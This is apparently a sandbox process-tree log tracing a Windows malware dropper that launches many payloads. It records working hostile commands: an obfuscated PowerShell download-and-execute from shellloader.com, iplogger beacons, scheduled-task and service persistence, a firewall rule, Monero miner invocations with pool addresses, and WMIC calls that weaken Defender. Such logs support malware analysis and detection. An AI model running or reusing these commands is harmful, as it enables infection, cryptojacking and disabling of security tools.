C:\Users\Admin\Documents\rXPk4TSLmkZxrpqjxILebbx3.exe"C:\Users\Admin\Documents\rXPk4TSLmkZxrpqjxILebbx3.exe"6⤵PID:6292
-
-
C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe"C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe"6⤵PID:6352
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe"7⤵PID:3360
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:1744
-
-
-
-
C:\Users\Admin\Documents\NRKdhu3FjwEYxWuqX1GM9tmX.exe"C:\Users\Admin\Documents\NRKdhu3FjwEYxWuqX1GM9tmX.exe"6⤵PID:6772
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵PID:3128
-
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"9⤵PID:7956
-
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵PID:3468
-
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵PID:6480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:6564
-
-
-
-
C:\Users\Admin\Documents\gwoI9cbYOZOkJu8BtGJ9beIv.exe"C:\Users\Admin\Documents\gwoI9cbYOZOkJu8BtGJ9beIv.exe"6⤵PID:6164
-
-
C:\Users\Admin\Documents\M9mz0NBIx4WXR5ve6tIic_At.exe"C:\Users\Admin\Documents\M9mz0NBIx4WXR5ve6tIic_At.exe"6⤵PID:6124
-
C:\Users\Admin\AppData\Roaming\3993501.scr"C:\Users\Admin\AppData\Roaming\3993501.scr" /S7⤵PID:8152
-
-
C:\Users\Admin\AppData\Roaming\7947245.scr"C:\Users\Admin\AppData\Roaming\7947245.scr" /S7⤵PID:3128
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:3216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 6566⤵
- Program crash
PID:5024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 6726⤵
- Program crash
PID:2532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 6766⤵
- Program crash
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 6686⤵
- Program crash
PID:5248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 9046⤵
- Program crash
PID:6052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 8606⤵
- Program crash
PID:5028
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:4836
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:5568
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5168
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4592
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:5524
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:4740
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:7452
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:4996
-
C:\ProgramData\6729350.exe"C:\ProgramData\6729350.exe"8⤵PID:1560
-
-
C:\ProgramData\8207374.exe"C:\ProgramData\8207374.exe"8⤵PID:60
-
-
C:\ProgramData\2626855.exe"C:\ProgramData\2626855.exe"8⤵PID:5100
-
C:\ProgramData\2626855.exe"C:\ProgramData\2626855.exe"9⤵PID:3172
-
-
-
C:\ProgramData\4064345.exe"C:\ProgramData\4064345.exe"8⤵PID:5436
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:3608
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3608 -s 15328⤵
- Program crash
PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:4876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 7288⤵
- Program crash
PID:5676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 9408⤵
- Program crash
PID:5948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 9568⤵
- Program crash
PID:1312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 9608⤵
- Program crash
PID:5472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 9448⤵
- Program crash
PID:4476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 10528⤵
- Program crash
PID:6132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 9448⤵
- Program crash
PID:2324
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:5012
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:5540
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5540 -s 15288⤵
- Program crash
PID:6008
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe"8⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe9⤵PID:6376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\is-4UQ0U.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4UQ0U.tmp\setup_2.tmp" /SL5="$30286,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\is-Q83SP.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q83SP.tmp\setup_2.tmp" /SL5="$302A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\is-RNM5H.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-RNM5H.tmp\postback.exe" ss111⤵PID:7124
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:2652
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵PID:1528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"13⤵PID:6716
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"14⤵PID:7532
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"15⤵PID:5680
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"13⤵PID:8796
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"14⤵PID:9192
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"15⤵PID:8240
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:6040
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:5832
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
PID:1952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun19eb40faaaa9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19eb40faaaa9.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun19eb40faaaa9.exe /f7⤵
- Kills process with taskkill
PID:5432
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:5296
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe"6⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe7⤵PID:2804
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:3612
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:3044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun193fda712d9f1.exeSun193fda712d9f1.exe1⤵
- Executes dropped EXE
PID:2728
-
C:\Users\Admin\AppData\Local\Temp\is-DOAPL.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-DOAPL.tmp\Sun1966fb31dd5a07.tmp" /SL5="$50032,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1966fb31dd5a07.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\is-EQAQE.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-EQAQE.tmp\Ze2ro.exe" /S /UID=burnerch22⤵PID:4728
-
C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe"C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe" /VERYSILENT3⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\is-U9VVC.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-U9VVC.tmp\ultramediaburner.tmp" /SL5="$2028A,281924,62464,C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe" /VERYSILENT4⤵PID:5592
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:1008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e7-f2dbc-3a1-39986-38d0f631a4eec\Lociwashomae.exe"C:\Users\Admin\AppData\Local\Temp\e7-f2dbc-3a1-39986-38d0f631a4eec\Lociwashomae.exe"3⤵PID:5616
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 13484⤵PID:7728
-
-
-
C:\Users\Admin\AppData\Local\Temp\45-e27a7-a8d-45ba0-43db74471cb5b\Jajyloshaesho.exe"C:\Users\Admin\AppData\Local\Temp\45-e27a7-a8d-45ba0-43db74471cb5b\Jajyloshaesho.exe"3⤵PID:4884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exe /eufive & exit4⤵PID:7628
-
C:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exe /eufive5⤵PID:7868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:7948
-
C:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exeC:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exe /qn CAMPAIGN="654"5⤵PID:8156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exe & exit4⤵PID:2144
-
C:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exeC:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exe5⤵PID:7844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exe /mixfive & exit4⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exe /mixfive5⤵PID:7572
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1905815e51282417.exeSun1905815e51282417.exe1⤵
- Executes dropped EXE
PID:2664
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19262b9e49ad.exeSun19262b9e49ad.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:5760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:480
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3820 -
C:\Users\Admin\AppData\Roaming\4250079.scr"C:\Users\Admin\AppData\Roaming\4250079.scr" /S2⤵PID:4644
-
-
C:\Users\Admin\AppData\Roaming\2061696.scr"C:\Users\Admin\AppData\Roaming\2061696.scr" /S2⤵PID:2296
-
-
C:\Users\Admin\AppData\Roaming\1032292.scr"C:\Users\Admin\AppData\Roaming\1032292.scr" /S2⤵PID:2004
-
C:\Users\Admin\AppData\Roaming\1032292.scr"C:\Users\Admin\AppData\Roaming\1032292.scr"3⤵PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 8923⤵
- Program crash
PID:3944
-
-
-
C:\Users\Admin\AppData\Roaming\7314198.scr"C:\Users\Admin\AppData\Roaming\7314198.scr" /S2⤵PID:1124
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3788 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1452
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7200 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Temp\BE17.exeC:\Users\Admin\AppData\Local\Temp\BE17.exe1⤵PID:4932
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7312
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2F4C29E1DBB534E80D4943E8275209E8 C2⤵PID:7768
-
-
C:\Users\Admin\AppData\Local\Temp\1DAD.exeC:\Users\Admin\AppData\Local\Temp\1DAD.exe1⤵PID:2224
-
C:\Users\Admin\AppData\Local\Temp\A7FC.exeC:\Users\Admin\AppData\Local\Temp\A7FC.exe1⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\C1FE.exeC:\Users\Admin\AppData\Local\Temp\C1FE.exe1⤵PID:7304
-
C:\Users\Admin\AppData\Local\Temp\C1FE.exeC:\Users\Admin\AppData\Local\Temp\C1FE.exe2⤵PID:8600
-
-
C:\Users\Admin\AppData\Local\Temp\137A.exeC:\Users\Admin\AppData\Local\Temp\137A.exe1⤵PID:9124
-
C:\Users\Admin\AppData\Local\Temp\284B.exeC:\Users\Admin\AppData\Local\Temp\284B.exe1⤵PID:8508
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\284B.exe"2⤵PID:8776
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:8928
-
-
-
C:\Users\Admin\AppData\Local\Temp\358B.exeC:\Users\Admin\AppData\Local\Temp\358B.exe1⤵PID:2844
-
C:\Users\Admin\AppData\Local\Temp\AF30.exeC:\Users\Admin\AppData\Local\Temp\AF30.exe1⤵PID:7388
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\skdlpaon\2⤵PID:9108
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\krpafaoc.exe" C:\Windows\SysWOW64\skdlpaon\2⤵PID:6392
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create skdlpaon binPath= "C:\Windows\SysWOW64\skdlpaon\krpafaoc.exe /d\"C:\Users\Admin\AppData\Local\Temp\AF30.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4940
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description skdlpaon "wifi internet conection"2⤵PID:5004
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start skdlpaon2⤵PID:7672
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\tbdcivgC:\Users\Admin\AppData\Roaming\tbdcivg1⤵
- Executes dropped EXE
PID:4512
-
C:\Users\Admin\AppData\Roaming\shdcivgC:\Users\Admin\AppData\Roaming\shdcivg1⤵PID:4704
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8248 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8296
-
C:\Windows\SysWOW64\skdlpaon\krpafaoc.exeC:\Windows\SysWOW64\skdlpaon\krpafaoc.exe /d"C:\Users\Admin\AppData\Local\Temp\AF30.exe"1⤵PID:8500
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:7336
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:8720
-
-
-
C:\Users\Admin\AppData\Local\Temp\CA46.exeC:\Users\Admin\AppData\Local\Temp\CA46.exe1⤵PID:8908
-
C:\Users\Admin\AppData\Local\Temp\DF7.exeC:\Users\Admin\AppData\Local\Temp\DF7.exe1⤵PID:8436
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9064 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8500
-
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exe W8 /site_id 668658 /S1⤵PID:6808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:1748
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:7180
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:8088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:9192
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6876
-
-
-
-
-
-
